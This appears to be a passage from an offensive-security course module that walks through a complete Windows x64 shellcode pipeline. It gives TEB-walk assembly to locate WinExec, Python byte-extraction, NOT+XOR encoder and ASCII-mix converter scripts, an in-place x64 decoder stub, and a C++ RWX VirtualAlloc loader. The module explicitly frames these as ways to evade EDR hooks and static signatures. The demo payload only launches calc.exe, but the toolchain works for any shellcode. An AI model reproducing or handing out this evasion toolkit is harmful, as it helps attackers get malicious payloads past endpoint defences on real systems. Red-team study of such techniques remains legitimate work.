Push "WinExec" using NOT encoding + SHL/SHR null termination ──── mov rax, 0x6F9C9A87BA9196A8 ; NOT-encoded "WinExec" — no plaintext in bytes not rax ; decode: RAX = 0x90636578456E6957 shl rax, 0x8 shr rax, 0x8 ; RAX = "WinExec\0" — null in MSB, not in shellcode bytes push rax mov rax, rsp add rsp, 0x8 ; ── Search AddressOfNames for "WinExec" ───────────────────────────── kernel32findfunction: jecxz FunctionNameNotFound xor ebx, ebx mov ebx, [r11+rcx*4] add rbx, r8 dec rcx mov r9, [rax] cmp [rbx], r9 jz FunctionNameFound jnz kernel32findfunction FunctionNameNotFound: int3 FunctionNameFound: inc ecx xor r11, r11 mov r11d,[rdx+0x1c] add r11, r8 mov r15d,[r11+rcx*4] add r15, r8 ; R15 = WinExec VMA ; ── Call WinExec("calc.exe", 1) ───────────────────────────────────── xor rax, rax push rax mov rax, 0x9A879AD19C939E9C ; NOT-encoded "calc.exe" not rax push rax mov rcx, rsp xor rdx, rdx inc rdx sub rsp, 0x30 call r15
The Unicode comparison value 0x004E00520045004B encodes "K E R N" as UTF-16LE WORD pairs: K=004B, E=0045, R=0052, N=004E stored as an 8-byte little-endian immediate. A single cmp rbx, rdx checks all four characters simultaneously.

Tool 1 — findhex.py: Windows-Native Shellcode Extraction

Extracting raw shellcode bytes from a compiled .obj file historically required Linux tools. This Python script runs on Windows using the MinGW-bundled objdump. It parses the disassembly output, strips the byte columns, and outputs them as \xNN escape sequences ready to paste into a loader — no VM, no Linux, no context switch.

Python findhex.py — extract \xNN shellcode bytes from .obj on Windows
# findhex.py — g3tsyst3m Module 9 # Extracts raw shellcode bytes from a NASM-compiled .obj file # Requires: MinGW objdump in PATH (included with the NASM/MinGW toolchain) # Usage: python findhex.py calc.obj # Output: \x4d\x87\xe6\x48... printed to stdout import re import subprocess import sys def generateshellcode(obj_file): result = subprocess.run( ['objdump', '-D', obj_file], capture_output=True, text=True, check=True ) objdump_output = result.stdout # Replace " <" so label text like "<main>" doesn't match the hex regex objdump_output = objdump_output.replace(" <", "--|") # Match exactly two hex chars followed by a space — the byte column format # Negative lookbehind prevents matching hex that's part of an address pattern = r'(?<![a-zA-Z])[0-9a-fA-F]{2} ' matches = re.findall(pattern, objdump_output, flags=re.IGNORECASE) prefixed_hex = [r'\x' + m.strip() for m in matches] print(''.join(prefixed_hex)) if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python findhex.py <.obj file>"); sys.exit(1) generateshellcode(sys.argv[1])

Tool 2 — NOT + XOR Encoder with Embedded Key

This encoder applies Bitwise NOT to every byte first, then XORs with a chosen key (default 0xAC). The result contains no recognizable API name strings and no common shellcode byte patterns. What makes it especially useful: the XOR key is embedded inside the encoded payload at position key_value % payload_length. Change the key and both the encoded bytes and the key's position in the output change — two layers of variability from one parameter.

The decoder stub reverses in order: XOR each byte with the key, then NOT — both operations are self-inverse so the decode is structurally identical to the encode.

Python not_xor_encoder.py — Bitwise NOT + XOR with embedded key discovery
# not_xor_encoder.py — g3tsyst3m Module 9 # Two-pass encoder: NOT every byte, then XOR with key # The key byte is embedded in the output at position (key % len) — self-locating # Usage: paste findhex.py output into shellcode variable, then run this script # Change xor_key to any non-null byte; 0xAC avoids bad chars for this shellcode import sys # Paste findhex.py output here: shellcode = ( b"\x4d\x87\xe6\x48\x83\xec\x28\x48\x8d\x3f\x48\x83\xe4\xf0" # ... full shellcode from findhex.py ) xor_key = 0xAC # Step 1 — Bitwise NOT every byte not_encoded = bytearray((~b) & 0xFF for b in shellcode) # Step 2 — XOR with key not_xor = bytearray(b ^ xor_key for b in not_encoded) # Step 3 — Embed key at deterministic position # Position = key_value % payload_length # Changing the key changes both the encoded bytes AND the position — double variability key_pos = xor_key % len(not_xor) encoded = bytearray(not_xor) encoded.insert(key_pos, xor_key) result = ''.join(f'\\x{b:02x}' for b in encoded) print(f"[*] Encoded shellcode ({len(encoded)} bytes):") print(result) print() print(f"[*] XOR key: 0x{xor_key:02x}") print(f"[*] Key position: offset {key_pos} in encoded output") print(f"[*] Decode at runtime: XOR each byte with key, then NOT")

Tool 3 — The NOT+XOR Decoder in x64 Assembly

With the shellcode encoded, the runtime decoder needs to reverse both operations in correct order: XOR each byte with the key first, then NOT each byte. Because both NOT and XOR are self-inverse, the decode loop is structurally identical to how you'd write the encode — just applied at runtime in memory rather than at script time.

The key lives inside the encoded shellcode at a known index position — printed by the encoder script. For the example below, key index 38 was chosen: mov r9b, [rel encoded_shellcode + 38]. The decoder reads the key directly from the payload, walks every byte applying XOR then NOT, then reloads the base address and jumps to the now-restored shellcode via jmp rax.

NASM x64 decoder.asm — NOT+XOR decoder stub with encoded shellcode inline in .text
; decoder.asm — g3tsyst3m Module 9 ; Compile: nasm -fwin64 decoder.asm ; Link: ld -m i386pep -N -o decoder.exe decoder.obj ; ; -N flag: makes .text section writable+executable (needed because the decoder ; writes decoded bytes back into encoded_shellcode in-place at runtime) ; ; Key index 38 was chosen from the not_xor_encoder.py output — the offset where ; the encoder embedded key byte 0xAC inside the encoded payload. BITS 64 section .data section .text global main main: ; ── Load base address of encoded_shellcode RIP-relative ──────────── lea rsi, [rel encoded_shellcode] ; ── Read the embedded key from its known index in the payload ────── mov r9b, [rel encoded_shellcode + 38] ; R9B = XOR key (0xAC at index 38) ; ── Set loop counter = payload length ────────────────────────────── mov rcx, encoded_shellcode_len ; immediate value, no rel needed for EQU decode_loop: mov al, [rsi] ; AL = current encoded byte xor al, r9b ; AL ^= key → reverses XOR encoding step not al ; AL = ~AL → reverses NOT encoding step mov [rsi], al ; write original byte back in-place inc rsi ; advance pointer loop decode_loop ; dec RCX, repeat until zero ; ── Jump to fully decoded shellcode ──────────────────────────────── lea rax, [rel encoded_shellcode] ; reload base (RSI advanced past end during decode) jmp rax ; execute the now-decoded calc shellcode ; ── NOT+XOR encoded payload — inline in .text ─────────────────────── ; Generated by not_xor_encoder.py on the TEB-walk calc.asm shellcode. ; Key 0xAC embedded at offset 38 (the 0xAC byte at position [38]). encoded_shellcode: db 0x1e,0xd4,0xb5,0x1b,0xd0,0xbf,0x7b,0x1b,0xde,0x6c,0x1b,0xd0,0xb7,0xa3 db 0x1e,0xd4,0xa7,0x1b,0x62,0x9a,0x1a,0xd4,0xaf,0x36,0x1b,0xd8,0x57,0x76 db 0x63,0x53,0x53,0x53,0x1b,0xd8,0x13,0x33,0x1b,0x62,0xac,0x1b,0xd8,0x13 db 0x4b,0x1a,0xd4,0xad,0x1b,0xd8,0x23,0x43,0x1b,0xd0,0x94,0x53,0x1b,0xd8 db 0x65,0x1f,0xd4,0xbc,0x1b,0xd8,0x1d,0x33,0x1f,0xd4,0xbc,0x1b,0xd8,0x4a db 0x1e,0xd4,0xbf,0x1b,0xe9,0x18,0x53,0x16,0x53,0x01,0x53,0x1d,0x53,0x1b db 0x62,0xac,0x1b,0x6a,0x80,0x27,0x5b,0x1a,0xd4,0xaf,0x26,0x85,0x1f,0xd4 db 0xb4,0x1b,0xd8,0x0d,0x63,0x1e,0xda,0xa5,0x1a,0xda,0x8b,0x1e,0xd4,0xb6 db 0xd8,0x08,0x6f,0x1e,0x38,0xb7,0x52,0x1f,0x52,0x90,0x1e,0xda,0xb7,0x1b db 0x62,0x9a,0x1a,0x92,0xb6,0x53,0x35,0xd2,0x92,0xac,0xdb,0x1e,0xd4,0xbd db 0x1b,0x92,0xba,0x5b,0x1a,0x92,0x9f,0x53,0xd8,0x47,0x58,0x1f,0xd4,0xb4 db 0x1f,0x52,0x91,0x1e,0xda,0xbe,0x17,0xd8,0x01,0x47,0x1e,0x62,0xbe,0x1e db 0x62,0x88,0x1a,0xd0,0xbf,0x53,0x17,0xd8,0x09,0x73,0x1a,0xd0,0xad,0x53 db 0x1e,0x52,0x90,0x1e,0xd4,0xbd,0x1f,0xda,0x82,0x1f,0xd4,0xbc,0x1b,0xeb db 0xfb,0xc5,0xc2,0xe9,0xd4,0xc9,0xcf,0x3c,0x1b,0x92,0x9c,0x53,0x1b,0xa4 db 0x83,0x1a,0xd4,0xae,0x1b,0x92,0xb3,0x5b,0x1e,0xda,0xbe,0x1b,0x92,0xbb db 0x5b,0x1e,0xd4,0xb5,0x03,0x1e,0xd6,0xa5,0x1b,0xda,0xb3,0x1a,0xd4,0xad db 0x1b,0xd0,0x97,0x5b,0x1e,0xda,0xb7,0x34,0xb0,0x63,0x1a,0xd4,0xad,0x62 db 0x88,0x1a,0xd4,0xaf,0x12,0xd8,0x4f,0xd8,0x1b,0x92,0xb4,0x53,0x1f,0x52 db 0x90,0x1e,0xd4,0xb5,0x1b,0xac,0x9a,0x1a,0xd4,0xaf,0x1f,0xd8,0x5b,0x1e db 0xd4,0xa7,0x1f,0x6a,0x58,0x27,0x5e,0x1e,0xd4,0xbd,0x26,0x82,0x1a,0x92 db 0xb5,0x53,0x9f,0x1a,0xd4,0xaf,0xac,0x92,0x1e,0xd6,0xb7,0x1e,0x62,0x88 db 0x1e,0xd4,0xa7,0x17,0xd8,0x09,0x4f,0x1f,0xd4,0xa4,0x1e,0x52,0x90,0x1e db 0xd4,0xbf,0x16,0xd8,0x6f,0xd8,0x1a,0xd4,0xad,0x1e,0x52,0x94,0x1e,0x62 db 0xa5,0x1b,0x62,0x93,0x1a,0xd0,0x96,0x53,0x03,0x1a,0xd4,0xae,0x1b,0xeb db 0xcf,0xcd,0xc0,0xcf,0x82,0xc9,0xd4,0xc9,0x1a,0xd0,0xaf,0x53,0x1b,0xa4 db 0x83,0x1e,0xd4,0xbd,0x03,0x1a,0xd4,0xad,0x1b,0xda,0xb2,0x1e,0xd6,0xb7 db 0x1b,0x62,0x81,0x1e,0xd4,0xbd,0x1b,0xac,0x91,0x1a,0xd4,0xad,0x1b,0xd0 db 0xbf,0x63,0x1a,0xd4,0xaf,0x12,0xac,0x84,0x1e,0xd4,0xa7,0x53,0x53,0x53 db 0x53,0x53 encoded_shellcode_len equ $ - encoded_shellcode
The -N linker flag (--omagic) marks the .text section writable+executable. This is required for the standalone test binary because the decoder writes decoded bytes back into encoded_shellcode in-place — which lives in .text. The C++ loader below uses PAGE_EXECUTE_READWRITE VirtualAlloc memory instead, so -N is not needed there.

Tool 4 — Alpha/Mix Encoding: Converting to ASCII-Printable Shellcode

The final encoding layer converts the complete payload (decoder stub + encoded shellcode) into a mixed ASCII/hex format where each byte is expressed as its printable ASCII character if one exists, and as a \xNN hex escape otherwise. This is the "alpha/mix" format — not purely alphanumeric, but as human-readable as the byte values allow, and compatible with C string literal delivery.

The workflow: compile decoder.asm to a .obj, run findhex.py on it to extract all bytes (decoder stub bytes + inline encoded shellcode), then pass that full byte string through the alpha/mix script. The output pastes directly into a C const unsigned char shellcode[] string literal — adjacent tokens are concatenated automatically by the compiler.

Python alpha_mix.py — convert binary shellcode bytes to mixed ASCII/hex C string tokens
# alpha_mix.py — g3tsyst3m Module 9 # Converts binary shellcode to mixed ASCII/hex format for C string literals. # Printable bytes → their ASCII character. Non-printable → \xNN escape. # Special cases handle ' and " to avoid breaking C string literal syntax. # # Input: hex_list = full payload bytes from findhex.py on the decoder .obj # (includes decoder stub bytes + encoded_shellcode bytes inline) # Output: space-separated string tokens — paste into shellcode[] in loader.cpp # Paste findhex.py output from decoder.obj here: # (this is the full combined payload: decoder stub + encoded shellcode) hex_list = ( b"\x48\x8d\x35\x23\x00\x00\x00\x44\x8a\x0d\x42\x00\x00\x00" b"\xb9\x98\x01\x00\x00\x8a\x06\x44\x30\xc8\xf6\xd0\x88\x06" b"\x48\xff\xc6\xe2\xf2\x48\x8d\x05\x02\x00\x00\x00\xff\xe0" # ... followed by all encoded_shellcode bytes ) alphanumericfinal = [] for bytey in hex_list: r = repr(chr(bytey)) if bytey == 0x27: # single quote — C literal syntax break alphanumericfinal.append("\"\\'\"" ) elif bytey == 0x22: # double quote — C literal syntax break alphanumericfinal.append('\"\\""') elif bytey == 0x20: # space — explicit hex to avoid ambiguity alphanumericfinal.append("\"\\x20\"") else: r = r.replace("'", '"') # swap repr single quotes → double quotes alphanumericfinal.append(r) print(' '.join(alphanumericfinal)) # space-separated: "H" "\x8d" "5" "#" ...

The Final C++ Loader

The alpha/mix output pastes directly into the shellcode[] array. The decoder stub runs first, decodes the embedded payload in-place, then jmp rax executes the original TEB-walk calc shellcode. PAGE_EXECUTE_READWRITE is required because the decoder modifies its own payload bytes at runtime — read+execute alone is insufficient.

C++ loader.cpp — final shellcode loader using the alpha/mix encoded payload
// loader.cpp — g3tsyst3m Module 9 // Paste alpha_mix.py output into shellcode[] below as adjacent string literals. // The C compiler concatenates them into a single continuous byte array. // Compile: x86_64-w64-mingw32-g++ -o loader.exe loader.cpp #include <windows.h> #include <iostream> const unsigned char shellcode[] = "H" "\x8d" "5" "#" "\x00" "\x00" "\x00" "D" "\x8a" "\r" "B" "\x00" "\x00" "\x00" "¹" "\x98" "\x01" "\x00" "\x00" "\x8a" "\x06" "D" "0" "È" "ö" "Ð" "\x88" "\x06" "H" "ÿ" "Æ" "â" "ò" "H" "\x8d" "\x05" "\x02" "\x00" "\x00" "\x00" "ÿ" "à" /* ... paste full alpha_mix.py output here ... */ ; int main() { size_t shellcode_size = sizeof(shellcode); // PAGE_EXECUTE_READWRITE required — decoder stub writes decoded bytes in-place void* exec_mem = VirtualAlloc( nullptr, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); if (!exec_mem) { std::cerr << "[-] VirtualAlloc failed\n"; return -1; } memcpy(exec_mem, shellcode, shellcode_size); // Cast and call — decoder stub runs first, decodes payload, jmps to shellcode auto fn = reinterpret_cast<void(*)()>(exec_mem); fn(); VirtualFree(exec_mem, 0, MEM_RELEASE); return 0; }

Full Pipeline — From .asm to Final Alpha/Mix Shellcode

Shell Complete workflow — calc.asm → encoded → decoder stub → alpha/mix → loader.cpp
# ── Stage 1: The payload shellcode ────────────────────────────────── # Write calc.asm (TEB-walk kernel32 finder + WinExec) # Compile to .obj nasm -fwin64 calc.asm -o calc.obj # Extract raw bytes python findhex.py calc.obj # Output: \x4d\x87\xe6... → paste into not_xor_encoder.py shellcode variable # Encode with NOT + XOR + embedded key python not_xor_encoder.py # Output: encoded bytes + "Key embedded at position: N" # Note the key index — you'll need it for decoder.asm # ── Stage 2: The decoder stub ──────────────────────────────────────── # Paste encoded bytes into decoder.asm as the encoded_shellcode db block # Update the key index: mov r9b, [rel encoded_shellcode + N] # Compile (no -no-pie needed; -N makes .text writable for standalone test) nasm -fwin64 decoder.asm -o decoder.obj ld -m i386pep -N -o decoder.exe decoder.obj # Test standalone: decoder.exe should launch calc.exe — confirms decode works decoder.exe # ── Stage 3: Extract + alpha/mix encode ───────────────────────────── # Extract full payload from decoder.obj (stub + encoded shellcode) python findhex.py decoder.obj # Output: full combined bytes → paste into alpha_mix.py hex_list variable # Convert to mixed ASCII/hex C string tokens python alpha_mix.py # Output: "H" "\x8d" "5" "#" "\x00" ... → paste into loader.cpp shellcode[] # ── Stage 4: Final loader ──────────────────────────────────────────── # Paste alpha_mix.py output into loader.cpp shellcode[] array # Compile and run — decoder stub fires, decodes in-place, calc.exe launches x86_64-w64-mingw32-g++ -o loader.exe loader.cpp
  • Both paths reach the PEB, but the standard mov rax, [gs:0x60] shortcut is a well-known and well-monitored access pattern. Some EDR products hook or monitor this specific GS segment offset access to detect shellcode performing PEB walks.

    Going through the TEB explicitly — gs:[0x30] for TEB base, then [rax+0x60] for PEB — is architecturally equivalent but takes a different code path. It also mirrors how Windows itself navigates these structures internally, making it harder to distinguish from legitimate code.

    💡 In WinDbg: dt nt!_TEB @$teb shows the TEB layout. PebBaseAddress is at offset 0x060. dt nt!_PEB @$peb shows the PEB layout — Ldr is at 0x018.
  • Windows stores module names as UTF-16LE strings. Each ASCII character becomes a 2-byte WORD: the ASCII value in the low byte, 0x00 in the high byte. Reading "KERN" as four UTF-16LE WORDs:

    • K = 0x004B, E = 0x0045, R = 0x0052, N = 0x004E
    • In memory (little-endian): 4B 00 45 00 52 00 4E 00
    • As a 64-bit little-endian immediate: 0x004E00520045004B

    Loading [rcx] (first 8 bytes of the name buffer) into RBX and comparing with this immediate checks all four characters in a single instruction. It's both efficient and NULL-free.

    💡 To search for a different DLL: take the first 4 characters of its name, encode each as a WORD (char + 0x00), then build the 8-byte little-endian immediate. For ntdll.dll: N=0x004E T=0x0054 D=0x0044 L=0x004C → 0x004C00440054004E.
  • Embedding the key at position = xor_key % len(payload) means the key byte position is a function of the key value itself. Change xor_key from 0xAC to 0x7F and two things change simultaneously:

    • All encoded bytes change — different XOR key produces completely different output bytes
    • The key's position in the output changes — 0x7F % len vs 0xAC % len are almost certainly different offsets

    This means a static signature targeting "the key byte is at offset N" is invalidated just by changing the key. The decoder stub computes the position formula itself, so it works for any key without modification.

    ⚠ Always verify the round-trip after changing the key. Some keys produce bad characters (0x00, 0x20, 0x0A, 0x0D) in the encoded output that will break delivery through string-handling functions. Test with your specific delivery mechanism.
  • Even when RSP and RBP appear absent from the shellcode's explicit instructions, they always have implicit roles. RSP is the active stack pointer — always in use, always changing with every push/pop/call/ret. Inserting junk that modifies RSP would immediately corrupt the stack and crash execution.

    RBP is excluded defensively — even if the shellcode doesn't explicitly use it, the compiler or linker may use frame-pointer conventions that depend on RBP being stable. It's excluded from the candidates list unconditionally:

    [r for r in candidates if r not in ['rsp', 'rbp']]

    For the calc.asm TEB-walk shellcode, the registers available for junk injection are typically r12, r13, r14 — the non-volatile callee-saved registers not needed in the KERN search or WinExec call chain. The script prints them on stderr when it runs so you can verify.

Module Complete. You now have a full end-to-end shellcode pipeline running natively on Windows — no msfvenom, no Linux VM: TEB-walk kernel32 discovery that bypasses EDR position hooks, Windows-native .obj byte extraction, NOT+XOR encoding with self-embedded key, an x64 decoder stub that decodes in-place and jmps to the payload, and alpha/mix conversion for C string literal delivery. No two builds produce the same bytes.